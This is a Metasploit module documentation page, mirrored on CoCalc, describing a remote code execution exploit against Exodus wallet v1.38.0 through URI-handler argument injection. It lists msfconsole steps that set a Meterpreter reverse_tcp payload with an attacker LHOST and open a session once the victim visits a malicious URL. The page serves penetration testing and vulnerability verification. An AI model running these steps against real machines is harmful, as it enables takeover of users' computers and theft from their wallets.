CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/browser/exodus.md
Views: 1904
Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. Using the Electron remote code execution vulnerability in protocol handler is possible to inject command line arguments via URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at Exodus v1.38.0.
Verification Steps
Install Exodus Wallet version
v1.38.0
Start
msfconsole
Do
use exploit/windows/browser/exodus
Do
set PAYLOAD windows/meterpreter/reverse_tcp
Do
set LHOST ip
Do
exploit
On the target machine, browse to the malicious URL and launch Exodus
Verify the Meterpreter session is opened